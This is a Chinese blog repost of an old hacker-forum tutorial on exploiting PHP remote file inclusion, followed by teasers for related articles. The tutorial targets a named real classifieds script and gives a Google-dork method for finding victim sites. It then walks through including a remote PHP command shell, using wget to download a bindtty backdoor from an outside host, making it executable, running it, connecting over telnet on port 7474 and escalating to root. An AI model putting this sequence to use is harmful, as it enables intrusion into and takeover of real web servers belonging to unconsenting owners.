远程文件包含漏洞的利用

文件包含漏洞深度解析:从LFI本地利用到RFI远程攻击的攻防实战 文件包含是Web开发中实现代码复用的常见机制,其核心原理是通过动态引入外部文件来提升开发效率。然而,当用户输入未经严格过滤直接传递给包含函数时,就会引发文件包含漏洞,导致信任边界崩塌。从技术价值看,理解文件包含漏洞有助于深入掌握Web应用安全的核心风险点,特别是路径遍历和空字节截断等经典攻击手法。在应用场景上,无论是PHPinclude函数还是JSP的包含标签,都可能成为攻击入口。本地文件包含(LFI)允许攻击者读取服务器敏感文件,如配置文件或日志;而远程文件包含(RFI)在特定配置下可直接执行远程恶意代 阅读详情
论坛登陆名: CrAcKlOVe
提交者邮件地址: CrAcKlOVe@Zj.com
提交者QQ号码:
版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!
标题: 远程文件包含漏洞的利用
内容:
▲远程文件包含漏洞的利用

****************************
*AuThor:CrAcKlOvE          *
*emA!l:CrAcKlOvE#zJ.cOM    *
*HoMePaGe:N/a,mAyBe DoWn   *
****************************
1)什么是远程文件包含漏洞?
让我们先看看以下代码,
<?
<!---     cOdz    --->

include($page);

<!---     cOdz    --->
?>

由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,
以web权限执行远程文件.

2)漏洞的初步应用
假设某一站点的index.php代码如下
<?
<!---     cOdz    --->

include($page);

<!---     cOdz    --->
?>
我们就可以提交:
http://siteurl.tld/index.php?page=http://远程服务器/文件名称
假设远程服务器warez.php,内容为
<?
<!---     cOdz    --->

system("ls /tmp/");

<!---     cOdz    --->
?>
这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.

3)实战演练
说了一大堆,现在开始锻炼实践能力了,嘿嘿.
⑴准备工作:
①存在远程文件包含漏洞的站点
②phpshell
③Backdoor

对于①,大家可以到www.cnns.net或者www.securiteam.com关注近期的漏洞,一定会有的,我们拿最近的Artmedic kleinanzeigen漏洞练手.
Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下url
http://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl
那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.
我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,
连接为 http://siteurl.com/index.php?site=anzeigenmaerktestart,于是
在www.google.com,搜索index.php?site=anzeigenmaerktestart,
那些!
使用Artm
edic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!

对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.

对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,
不过我经常使用bindtty,bindtty绑定7474端口.

⑵开始利用
①提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id
说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.
一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.
竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!

②提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty
这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.

③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.
http:!
//xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty
这样我们就有权限执行bindtty文件了!

④执行bindtty
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
成功的话,它会显示Daemon is starting...OK, pid = xxxx.
因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.
ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.

⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.

这样就差不多结束了,有问题的话欢迎提出.
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用远程包含Webshell 通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell。 阅读详情

相关推荐

PHP文件包含漏洞实战:利用php://input伪协议实现远程代码执行

文件包含是Web开发中常见的代码复用机制,其原理是通过include或require函数将外部文件内容引入当前脚本执行。当开发者未对用户输入的文件路径参数进行严格过滤时,便会产生文件包含漏洞,攻击者可借此读取敏感文件或执行任意代码。该漏洞的技术价值在于其可能引发信息泄露、权限提升乃至完整的系统沦陷,在内容管理系统、模板引擎等场景中尤为常见。结合php://input伪协议,攻击者能直接通过HTTP请求体注入PHP代码,实现远程代码执行(RCE)。本文以iwebsec靶场为例,详细演示了如何通过BurpSui

weixin_33743703的博客 295

远程文件包含原理及利用

远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。

G3et的博客 993

文件包含原理及本地文件包涵漏洞案例演示;远程文件包含漏洞案例讲解和演示;文件包含漏洞之文件上传漏洞利用

文件包含原理及本地文件包涵漏洞案例演示 一、文件包含漏洞概述(摘录) 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简介,会使用“包含”函数功能。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求,会让前端用户选择...

qq_44696653的博客 1395

Pikachu靶场实战:深度剖析远程文件包含漏洞原理与利用

文件包含漏洞是Web安全中一种常见的代码注入类漏洞,其核心原理在于应用程序未对用户可控的输入进行充分验证,导致攻击者能够动态包含并执行恶意文件。从技术实现上看,当程序使用`include`或`require`等函数时,若传入的文件路径参数未经过滤,攻击者便可利用此缺陷读取敏感文件甚至执行任意代码。远程文件包含作为其高危变种,允许包含远程服务器上的文件,危害性更大,常需`allow_url_include`配置开启。在工程实践中,此类漏洞常与其他漏洞(如文件上传)组合利用,形成攻击链。针对Pikachu靶场中

weixin_33923762的博客 408

Web安全领域的探索之远程文件包含漏洞(LFI)

Web安全领域的探索之远程文件包含漏洞(LFI)

Innocence_0的博客 1758

7-2远程文件包含漏洞案例讲解和演示

远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去

山兔的博客 3044

【网络安全】本地文件包含远程文件包含漏洞详解

开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。

goldfish8848的博客 1846

文件包含远程文件包含漏洞利用

文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。(1 ) include等函数通过动态执行变量的方式引入需要包含的文件。如果文件有代码,会将包含文件以php文件的类型解析。(2)用户能控制该动态变量。1.查看配置是否开启。

wj33333的博客 937

文件包含漏洞(概述、原理、特点、PHP中的文件包含漏洞、相关函数、本地/远程文件包含漏洞利用利用PHP封装协议、包含日志文件)

文章目录文件包含漏洞一、概述二、PHP中的文件包含漏洞相关1. PHP中的文件包含函数1.1 include()1.2 include_once()1.3 require()1.4 require_once()2. PHP相关配置3. 漏洞示例3.1 本地包含示例3.2 远程包含示例4. 漏洞原理5. 漏洞特点5.1 无视文件扩展名读取文件5.2 无条件解析PHP代码6. 空字符安全绕过三、漏洞利用1. 读取敏感文件2. 直接包含图片木马3. 包含木马写Shell4. 利用PHP封装协议4.1 访问本地文件

Pluto.的博客 1183

string.h包含哪些函数_远程文件包含漏洞利用

漏洞介绍File Inclusion(文件包含漏洞)概述文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:include(),include_once()require(),require_once()这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中...

weixin_39669204的博客 128

远程代码执行与文件包含漏洞:原理、利用与防御实战

在Web安全领域,远程代码执行和文件包含漏洞是两类高危安全威胁,常被攻击者组合利用以完全控制系统。远程代码执行的核心在于程序错误地将用户输入当作代码执行,打破了数据与代码分离的基本原则,常见于命令注入、代码注入及反序列化等场景。文件包含漏洞则允许攻击者读取或包含服务器上的敏感文件,如配置文件或日志,进而可能升级为代码执行。理解其原理有助于构建纵深防御体系,例如通过输入验证、最小权限原则和安全配置来加固系统。在渗透测试和CTF比赛中,掌握绕过技巧和组合利用方法至关重要。本文深入探讨了这两类漏洞利用手法与防御

weixin_33795093的博客 430

远程文件包含漏洞利用指南:从零开始搭建Web服务器到Getshell

本文深入剖析远程文件包含漏洞利用原理与实战技巧。从零开始搭建包含漏洞的Web服务器环境,详细演示了如何利用远程包含功能执行任意代码,最终实现Getshell。文章涵盖了漏洞本质、环境配置、核心利用技术(如结合图片马)及防御措施,为安全研究人员提供从入门到精通的实战指南。

weixin_29269441的博客 394

深入剖析phpMyAdmin 4.8.1远程文件包含漏洞:从二次编码绕过到实战利用

本文深入剖析了phpMyAdmin 4.8.1远程文件包含漏洞CVE-2018-12613的成因与利用。通过分析二次编码绕过安全检查的核心原理,结合Docker环境复现,详细演示了从文件读取到利用Session文件实现命令执行,以及直接写入WebShell的两种实战利用手法,并探讨了漏洞修复方案与安全启示。

weixin_29322855的博客 360

php远程文件包含漏洞的前提是,PHP远程文件包含漏洞利用

PHP远程文件包含漏洞利用by:CrAcKlOve让我们先看看以下代码,Codz: include($page); ?>由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,以web权限执行远程文件.2)漏洞的初步应用假设某一站点的index.php代码如下Codz: include($page); ?&...

weixin_29535577的博客 469

深入剖析文件包含漏洞:本地与远程的威胁及应对

在 Web 安全领域,文件包含漏洞是一种常见且危险的安全隐患,它分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。这两种漏洞一旦被攻击者利用,都可能给网站和服务器带来严重的安全风险。今天,就让我们一起深入了解一下这两种漏洞

m0_57836225的博客 1153

文件包含漏洞:本地包含与远程包含的利用场景

文件包含漏洞分析与利用 文件包含漏洞是Web安全中极具破坏力的漏洞类型,主要通过PHPinclude类函数实现。当用户能够控制被包含的文件路径时,攻击者可以读取服务器敏感文件或执行任意代码。 漏洞分为本地文件包含(LFI)和远程文件包含(RFI)两种类型。LFI只能包含本地文件,但通过配合上传点或利用日志/Session文件仍可实现代码执行;RFI可直接包含远程服务器上的恶意文件,但需要PHP配置允许远程包含。 典型利用方式包括: 读取/etc/passwd等敏感文件 配合上传功能执行图片马 利用PHP

kft1314的博客 447

Web漏洞-文件包含漏洞超详细全解(附实例)_【web漏洞百例】

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…4.因为这里展示的是show.php文件,因此我们想到直接去访问show.php文件,可以看到当我们直接访问show.php时,网站返回的也是同样的内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

2401_84215240的博客 3591
上一篇: 假如我比对方BT(ALLyeSNO)
下一篇: 中国人自己研究的操作系统 MimiOS
freexploit
博客等级 码龄22年 315粉丝 778原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值